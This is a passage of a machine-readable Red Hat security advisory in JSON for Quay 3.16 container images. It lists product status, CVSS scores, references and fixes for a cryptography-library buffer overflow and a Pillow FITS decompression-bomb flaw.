            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456735"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the cryptography library. This vulnerability occurs when a non-contiguous buffer is passed to certain application programming interfaces (APIs) that accept Python buffers, such as Hash.update(). A remote attacker could exploit this to cause a buffer overflow, potentially leading to a denial of service.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "cryptography: Cryptography: Buffer overflow via non-contiguous buffer in API",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "In default configurations Red Hat products isolate service processes from total system access. Should an attacker be able to exploit this vulnerability their impact will be limited to that service account and they will not have access to the broader system.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456735",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456735"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-39892",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39892",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "http://www.openwall.com/lists/oss-security/2026/04/08/12",
          "url": "http://www.openwall.com/lists/oss-security/2026/04/08/12"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/cryptography/commit/622d672e429a7cff836a23c5903683dbec1901f5",
          "url": "https://github.com/pyca/cryptography/commit/622d672e429a7cff836a23c5903683dbec1901f5"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-p423-j2cm-9vmq",
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-p423-j2cm-9vmq"
        }
      ],
      "release_date": "2026-04-08T20:49:41.967000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "cryptography: Cryptography: Buffer overflow via non-contiguous buffer in API"
    },
    {
      "cve": "CVE-2026-40192",
      "cwe": {
        "id": "CWE-409",
        "name": "Improper Handling of Highly Compressed Data (Data Amplification)"
      },
      "discovery_date": "2026-04-16T00:00:49.590876+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2458856"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library\u0027s failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "RHBZ#2458856",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458856"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40192",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628",
          "url": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/pull/9521",
          "url": "https://github.com/python-pillow/Pillow/pull/9521"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j",
          "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j"
        },
        {
          "category": "external",
          "summary": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb",
          "url": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb"
